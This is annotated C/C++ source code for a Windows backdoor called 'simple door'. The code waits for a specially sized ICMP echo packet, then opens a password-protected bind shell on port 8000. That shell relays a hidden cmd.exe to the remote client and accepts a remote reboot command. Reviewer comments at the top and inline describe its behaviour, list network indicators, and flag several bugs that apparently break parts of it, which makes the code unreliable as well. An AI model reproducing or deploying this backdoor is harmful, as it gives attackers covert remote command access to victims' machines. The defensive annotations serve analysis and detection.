//
//simple door
//2010, February 4th
//author: LION
//annotated by Luzi
//Guilin, Guangxi  EST
//
// Reviewer's reading (defensive analysis of the listing as shown on this page):
//   1. main() opens a raw IP socket, switches it to SIO_RCVALL (every inbound IP datagram
//      on the bound interface; on Windows this needs an administrator-level process) and
//      waits for datagrams. The receive loop returns after the first datagram that is not
//      a timeout/error, so at most one packet is ever inspected per run.
//   2. A datagram is treated as the trigger when its length is exactly
//      SNIFFER_ICMP_SIZE+28 bytes and the byte at offset 20 (first byte after a 20-byte IP
//      header) equals ICMP_ECHO. The IP protocol field is never checked, so the match is
//      purely length + one byte.
//   3. binshell() then creates a SOCK_RAW socket, binds it to BIND_PORT, calls
//      listen()/accept() on it (return values unchecked), checks the first bytes received
//      against the plaintext DEF_PASSWORD with strstr(), and attaches a hidden cmd.exe to
//      the connection through two anonymous pipes with inherited handles.
// Host/network indicators visible in the code: TCP port BIND_PORT (8000), the literal
// DEF_PASSWORD, the banner strings in binshell(), a raw socket with SIO_RCVALL, and a
// cmd.exe child created with inherited pipe handles and SW_HIDE.
// NOTE(review): every "\n"/"\r" escape in the string literals on this page appears as
// "/n"/"/r" — almost certainly an extraction artifact; the literals are left byte-for-byte
// as published.
//
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <MSTCPIP.h>
//
#pragma comment(lib,"wsock32")
//
#define ICMP_ECHO 8 //ICMP echo request message type is 8
#define ICMP_ECHOREPLY 0 //ICMP echo reply message type is 0
#define SNIFFER_ICMP_SIZE 101 //payload size of the ICMP packet the sniffer waits for (bytes after the 28-byte IP+ICMP headers)
#define BIND_PORT 8000 //default bind shell port
#define MAX_PACKET 10000 //maximum size of a received datagram (receive buffer size)
#define DEF_PASSWORD "shandongluzi"//default password, stored in plaintext (string indicator)
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s)) //zeroed heap allocation; result is never freed or NULL-checked below
//
//IP header definition
//
typedef struct iphdr
{
    // type             name            meaning                                   bytes
    unsigned char h_verlen;       //4-bit header length, 4-bit IP version          1
    unsigned char tos;            //8-bit type of service (TOS)                    1
    unsigned short total_len;     //16-bit total length (bytes)                    2
    unsigned short ident;         //16-bit identification                          2
    unsigned short frag_and_flags;//3-bit flags + 13-bit fragment offset           2
    unsigned char ttl;            //8-bit time to live (TTL)                       1
    unsigned char proto;          //8-bit protocol (never inspected by this code)  1
    unsigned short checksum;      //16-bit IP header checksum                      2
    unsigned int sourceIP;        //32-bit source IP address                       4
    unsigned int destip;          //32-bit destination IP address                  4
}IPHeader; //IP header length is 20 bytes
//
//ICMP header definition
//
typedef struct _ihdr
{
    unsigned char i_type;   //8-bit type                                      1
    unsigned char i_code;   //8-bit code                                      1
    unsigned short i_cksum; //16-bit checksum                                 2
    unsigned short i_id;    //identifier (the process id is used as the id)   2
    unsigned short i_seq;   //sequence number                                 2
}ICMPHeader;//ICMP header length is 8 bytes
//
//function declarations
//
int sniffer();//waits for the trigger datagram (simple sniffer)
//simple SNIFFER
void decode_sniffer(char *,int ,struct sockaddr_in *);//inspects one datagram and starts the bind shell on a match
int binshell();//bind shell
DWORD dwBufferlen[10];  //output buffer handed to WSAIoctl(SIO_RCVALL)
DWORD dwBufferlnlen=1;  //input value for SIO_RCVALL: 1 enables receive-all mode
DWORD dwBytesReturned=0;//bytes returned by WSAIoctl
HANDLE bindthread;      //handle; declared but never used in this listing
//DOOR main function
//
// Entry point: initialises Winsock 2.2, runs sniffer() once, then cleans up.
// Exit code: 0 after sniffer() returns, -1 (via exit) if WSAStartup fails.
int main()
{
    WSADATA wsaData;//Winsock data
    int retval;//return value
    //SOCKET initialisation
    if ((retval=WSAStartup(MAKEWORD(2,2),&wsaData))!=0)
    {
        printf("WSASTARTUP failed:%d/n",retval);
        exit(-1);
    }
    //start the sniffer
    sniffer();
    //socket shutdown
    WSACleanup();
    return 0;
}
//
//sniffer function
//
// Opens a raw IP socket, binds it to the first resolved local address and port 8000,
// enables SIO_RCVALL (all inbound IP traffic on that interface), and receives datagrams.
// Returns -1 on socket/resolve/recvfrom failure, 1 after the first successfully received
// datagram (the `return 1` sits inside the while body, so the loop only repeats on
// WSAETIMEDOUT). Return values of bind(), WSAIoctl() and xmalloc() are not checked and
// recvbuf is never freed.
int sniffer()
{
    int packsize=SNIFFER_ICMP_SIZE;//expected ICMP payload size
    SOCKET sockersniffer; //raw socket
    struct sockaddr_in fro; //source address of the received datagram
    struct sockaddr_in des; //local address to bind
    struct hostent *hp; //local host entry
    int sread; //bytes read
    int fromlen=sizeof(fro);//size of the source address
    unsigned char LocalName[256];//local host name
    char *recvbuf;//receive buffer
    //
    //create a raw socket that receives all incoming packets
    if ((sockersniffer=WSASocket(AF_INET,SOCK_RAW,IPPROTO_IP,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET)
    {
        printf("wsasocket error %d/n",WSAGetLastError());
        return -1;
    }
    //obtain the local address
    gethostname((char*)LocalName,sizeof(LocalName)-1);
    if((hp=gethostbyname((char*)LocalName))==NULL)
    {
        return -1;
    }
    //
    //initialise DES, the destination/local IP
    memset(&des,0,sizeof(des));
    // NOTE(review): this is memset, not a copy — every byte of sin_addr is set to the low
    // byte of the h_addr_list[0] pointer value, so the address actually bound is not the
    // resolved host address.
    memset(&des.sin_addr.S_un.S_addr,(int)hp->h_addr_list[0],hp->h_length);
    //
    //sniffing options
    des.sin_family=AF_INET;
    des.sin_port=htons(8000);
    //
    //socket bind (return value unchecked)
    bind(sockersniffer,(PSOCKADDR)&des,sizeof(des));
    //
    //switch the socket to receive-all mode (return value unchecked)
    WSAIoctl(sockersniffer,SIO_RCVALL,&dwBufferlnlen,sizeof(dwBufferlnlen),&dwBufferlen,sizeof(dwBufferlen),&dwBytesReturned,NULL,NULL);
    //allocate a receive buffer of MAX_PACKET bytes (never freed, not NULL-checked)
    recvbuf=(char*)xmalloc(MAX_PACKET);
    printf("sinffer ok/n");
    while(1)
    {
        //read one datagram (includes the IP header)
        sread=recvfrom(sockersniffer,recvbuf,MAX_PACKET,0,(struct sockaddr*)&fro,&fromlen);
        //
        //read error
        if(sread==SOCKET_ERROR || sread <0)
        {
            //timeout: keep waiting
            if(WSAGetLastError()==WSAETIMEDOUT)
            {
                continue;
            }
            printf("recvfrom failed :%d/n",WSAGetLastError());
            return -1;
        }
        else if (sread >=28)
        {// 28 = 20-byte IP header + 8-byte ICMP header
            //only a datagram whose size is exactly the expected payload + 28 is inspected
            if(sread==packsize+28)
            {//hand the datagram to the decoder
                decode_sniffer(recvbuf,sread-28,&fro);
            }
        }
        // reached after any non-error read: the function returns after one datagram
        return 1;
    }
}
//
//simple sniffer decode routine
//
// Treats buf as an IP datagram, looks at the byte following the 20-byte IP header and,
// if it equals ICMP_ECHO, calls binshell(). The IP protocol field is not checked, so any
// datagram of the matching size with 0x08 at offset 20 satisfies the test.
// `bytes` and `from` are accepted but never read.
void decode_sniffer(char *buf, int bytes, struct sockaddr_in * from)
{
    //ICMP packet
    ICMPHeader *icmphdr;
    //the ICMP header starts at buf + IP header length (buf+20)
    icmphdr=(ICMPHeader *)(buf+sizeof(IPHeader));
    //simple test: is it an ICMP echo request?
    if(icmphdr->i_type==ICMP_ECHO)
    {
        //bind shell
        binshell();
    }
    else
        printf("/r/nGEt others packets!");
    return;
}
//
//bind shell
//
// Listens on BIND_PORT, accepts a single client, performs a plaintext password check and
// relays between the client socket and a hidden cmd.exe child via two anonymous pipes.
// Returns -1 on accept failure, wrong password or the "exit" command; 1 after one relay
// iteration or the reboot branch; the trailing `return 0` is unreachable from the loop.
// Every socket, pipe and process return value is ignored except where noted inline.
int binshell()
{
    int bport=BIND_PORT;//port to bind
    SOCKET binserver,getclient;//server and client sockets
    struct sockaddr_in addrserver,addrClient;//server and client addresses
    //
    //banner and status strings (cleartext protocol; usable as network signatures)
    char Buffer[4096];
    char *Message="/r luzi EST/r/n";
    char *getpass="/r enter password";
    char *passok="/r/nok! enter ";
    char *nothispass="/r/n sorry password is wrong/n";
    char *exitok="/r/nExit ok/n";
    char *rebook="/r/n Reboot now!/r/n";
    //
    //create a socket — note it is SOCK_RAW, yet listen()/accept() are used on it below
    binserver=socket(AF_INET,SOCK_RAW,IPPROTO_IP);
    //server address and port
    addrserver.sin_family=AF_INET;
    addrserver.sin_port=htons(bport);
    addrserver.sin_addr.S_un.S_addr=ADDR_ANY;
    //receive timeout, 60 s
    int timeout=60000;
    setsockopt(binserver,SOL_SOCKET,SO_RCVTIMEO,(CHAR *)&timeout,sizeof(timeout));
    //allow port reuse
    UINT bRetUser=1;
    setsockopt(binserver,SOL_SOCKET,SO_REUSEADDR,(CHAR *)&bRetUser,sizeof(bRetUser));
    //bind and listen (return values unchecked)
    bind(binserver,(struct sockaddr *)&addrserver,sizeof(addrserver));
    listen(binserver,2);
    printf("/r/n bind port on %d ok/n",bport);
    //accept a client connection
    int ilen=sizeof(addrClient);
    //accept exactly one connection
    getclient=accept(binserver,(struct sockaddr *)&addrClient,&ilen);
    if(getclient!=INVALID_SOCKET)
    {
        //a client connected: set its receive timeout to 60 s
        int itimeout=60000;
        setsockopt(getclient,SOL_SOCKET,SO_RCVTIMEO,(char *)&itimeout,sizeof(itimeout));
    }
    else
    {
        return -1;
    }
    //send the welcome banner
    send(getclient,Message,strlen(Message),0);
    //send the password prompt
    send(getclient,getpass,strlen(getpass),0);
    //receive the reply: Buffer is neither zeroed nor NUL-terminated after recv(),
    //so the strstr() below scans uninitialised stack bytes if no NUL arrives
    recv(getclient,Buffer,1024,0);
    //password check: a substring match anywhere in the received bytes is accepted
    if(!(strstr(Buffer,DEF_PASSWORD)))
    {
        //wrong password: report and close
        send(getclient,nothispass,strlen(nothispass),0);
        printf("/r/n password not ghist");
        closesocket(getclient);
        closesocket(binserver);
        return -1;
    }
    //password accepted
    send(getclient,passok,strlen(passok),0);
    //two anonymous pipes: pipe1 = child stdout/stderr -> us, pipe2 = us -> child stdin
    HANDLE HReadpipe1,hWritePipe1,Headpipe2,Hwritepipe2;
    unsigned long lBytesRead;
    SECURITY_ATTRIBUTES sa;
    sa.nLength=12; // hard-coded; equals sizeof(SECURITY_ATTRIBUTES) only on 32-bit builds
    sa.lpSecurityDescriptor=0;
    sa.bInheritHandle=TRUE; // pipe handles are inheritable so the child can use them
    //create the pipes (return values unchecked)
    CreatePipe(&HReadpipe1,&hWritePipe1,&sa,0);
    CreatePipe(&Headpipe2,&Hwritepipe2,&sa,0);
    STARTUPINFO siinfo;
    char cmdline[]="cmd.exe";
    //
    PROCESS_INFORMATION processinformation;
    ZeroMemory(&siinfo,sizeof(siinfo));
    siinfo.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    siinfo.wShowWindow=SW_HIDE; // child window hidden
    siinfo.hStdInput=Headpipe2;//child reads what we write into pipe2
    siinfo.hStdOutput=siinfo.hStdError=hWritePipe1;//child output goes into pipe1
    printf("/r/ncreata pipe ok/n");
    //
    //start cmd.exe with inherited handles (bInheritHandles=1); reads from pipe2, writes to pipe1
    int bread=CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&siinfo,&processinformation);
    // NOTE(review): the loop body ends in `return 1`, so at most one relay step runs
    while (1)
    {
        //check whether the child has produced output
        int ret=PeekNamedPipe(HReadpipe1,Buffer,1024,&lBytesRead,0,0);
        if(lBytesRead)
        {
            //read child output from pipe1
            ret=ReadFile(HReadpipe1,Buffer,lBytesRead,&lBytesRead,0);
            if(!ret) break;
            //forward it to the client
            ret=send(getclient,Buffer,lBytesRead,0);
            if(ret<=0) break;
        }
        else
        {
            //otherwise wait for client input
            //lBytesRead is unsigned, so this only catches 0 (orderly close); SOCKET_ERROR
            //(-1) becomes a large value and falls through to WriteFile with that length
            lBytesRead=recv(getclient,Buffer,1024,0);
            if (lBytesRead<=0) break;
            //write the client input into the child's stdin via pipe2
            ret=WriteFile(Hwritepipe2,Buffer,lBytesRead,&lBytesRead,0);
            //"exit" command: first four bytes compared individually
            if(lBytesRead>4 && Buffer[0]=='e' && Buffer[1]=='x' && Buffer[2]=='i' && Buffer[3]=='t')
            {
                //send the exit notice and close
                send(getclient,exitok,strlen(exitok),0);
                closesocket(getclient);
                closesocket(binserver);
                return -1;
            }
            else
            {
                //reboot branch: bytes 0..4 are compared against 'r','e','b','o','t'
                //(index 4 is tested for 't'); ExitWindowsEx needs SE_SHUTDOWN_NAME
                if(lBytesRead>6 && Buffer[0]=='r' && Buffer[1]=='e'&& Buffer[2]=='b'&& Buffer[3]=='o'&&Buffer[4]=='t')
                {
                    //send the reboot notice
                    send(getclient,rebook,strlen(rebook),0);
                    closesocket(getclient);
                    closesocket(binserver);
                    ExitWindowsEx(EWX_REBOOT,NULL);
                    return 1;
                }
                if(!ret) break;
            }
        }
        //reached after a single iteration: close both sockets and return
        closesocket(getclient);
        closesocket(binserver);
        return 1;
    }
    return 0;
}
简单后门 c++版 当年LION写 现详细注释